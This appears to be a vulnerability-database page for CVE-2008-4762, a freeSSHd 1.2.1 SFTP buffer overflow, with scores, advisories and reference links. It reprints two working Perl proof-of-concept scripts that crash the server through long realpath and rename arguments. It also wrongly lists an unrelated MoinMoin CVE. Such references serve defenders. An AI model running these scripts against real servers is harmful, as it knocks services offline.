CVE-2008-4762
published 2008-10-28CVE-2008-4762: Stack-based buffer overflow in freeSSHd 1.2.1 allows remote authenticated users to cause a denial of service (service crash) and potentially execute arbitrary…
PriorityP351critical9CVSS 2.0
AVNACLAuSCCICAC
EXPLOIT
EPSS
14.50%
96.2th percentile
Stack-based buffer overflow in freeSSHd 1.2.1 allows remote authenticated users to cause a denial of service (service crash) and potentially execute arbitrary code via a long argument to the (1) rename and (2) realpath parameters.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freesshd | freesshd | — | — |
CVSS provenance
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
ghsa6.8MEDIUM
osv6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-j28j-44j3-4pf2: Stack-based buffer overflow in freeSSHd 1
ghsa_unreviewed·2022-05-14
CVE-2008-4762 [HIGH] CWE-119 GHSA-j28j-44j3-4pf2: Stack-based buffer overflow in freeSSHd 1
Stack-based buffer overflow in freeSSHd 1.2.1 allows remote authenticated users to cause a denial of service (service crash) and potentially execute arbitrary code via a long argument to the (1) rename and (2) realpath parameters.
GHSA
MoinMoin Improper Access Control vulnerability
ghsa·2022-05-02·CVSS 6.8
CVE-2009-4762 [MEDIUM] CWE-284 MoinMoin Improper Access Control vulnerability
MoinMoin Improper Access Control vulnerability
MoinMoin 1.7.x before 1.7.3 and 1.8.x before 1.8.3 checks parent ACLs in certain inappropriate circumstances during processing of hierarchical ACLs, which allows remote attackers to bypass intended access restrictions by requesting an item, a different vulnerability than CVE-2008-6603.
OSV
CVE-2009-4762: MoinMoin 1
osv·2010-03-29·CVSS 6.8
CVE-2009-4762 CVE-2009-4762: MoinMoin 1
MoinMoin 1.7.x before 1.7.3 and 1.8.x before 1.8.3 checks parent ACLs in certain inappropriate circumstances during processing of hierarchical ACLs, which allows remote attackers to bypass intended access restrictions by requesting an item, a different vulnerability than CVE-2008-6603.
No detection rules found.
Exploit-DB
freeSSHd 1.2.1 - (Authenticated) SFTP 'realpath' Remote Buffer Overflow (PoC)
exploitdb·2008-10-22
CVE-2008-4762 freeSSHd 1.2.1 - (Authenticated) SFTP 'realpath' Remote Buffer Overflow (PoC)
freeSSHd 1.2.1 - (Authenticated) SFTP 'realpath' Remote Buffer Overflow (PoC)
---
#!/usr/bin/perl
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# FreeSSH 1.2.1 Crash #2 -- A Product of Fuzzing. Stay Tuned For More.
use Net::SSH2;
$host = "192.168.0.100";
$port = 22;
$username = "test";
$password = "test";
$dos = "A" x 262145;
$ssh2 = Net::SSH2->new();
$ssh2->connect($host, $port) || die "\nError: Connection Refused!\n";
$ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";
$sftp = $ssh2->sftp();
$realpath = $sftp->realpath($dos);
$ssh2->disconnect();
exit;
# milw0rm.com [2008-10-22]
Exploit-DB
freeSSHd 1.2.1 - (Authenticated) SFTP 'rename' Remote Buffer Overflow (PoC)
exploitdb·2008-10-22
CVE-2008-4762 freeSSHd 1.2.1 - (Authenticated) SFTP 'rename' Remote Buffer Overflow (PoC)
freeSSHd 1.2.1 - (Authenticated) SFTP 'rename' Remote Buffer Overflow (PoC)
---
#!/usr/bin/perl
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# FreeSSH 1.2.1 Crash -- A Product of Fuzzing. Stay Tuned.
use Net::SSH2;
$host = "192.168.0.187";
$port = 22;
$username = "test";
$password = "test";
$dos = "A" x 550000;
$ssh2 = Net::SSH2->new();
$ssh2->connect($host, $port) || die "\nError: Connection Refused!\n";
$ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";
$sftp = $ssh2->sftp();
$rename = $sftp->rename($dos, "test");
$ssh2->disconnect();
exit;
# milw0rm.com [2008-10-22]
No writeups or analysis indexed.
http://secunia.com/advisories/32366http://securityreason.com/securityalert/4515http://www.securityfocus.com/archive/1/497746/100/0/threadedhttp://www.securityfocus.com/bid/31872http://www.securitytracker.com/id?1021096http://www.vupen.com/english/advisories/2008/2897https://exchange.xforce.ibmcloud.com/vulnerabilities/46046https://www.exploit-db.com/exploits/6800https://www.exploit-db.com/exploits/6812http://secunia.com/advisories/32366http://securityreason.com/securityalert/4515http://www.securityfocus.com/archive/1/497746/100/0/threadedhttp://www.securityfocus.com/bid/31872http://www.securitytracker.com/id?1021096http://www.vupen.com/english/advisories/2008/2897https://exchange.xforce.ibmcloud.com/vulnerabilities/46046https://www.exploit-db.com/exploits/6800https://www.exploit-db.com/exploits/6812
2008-10-28
Published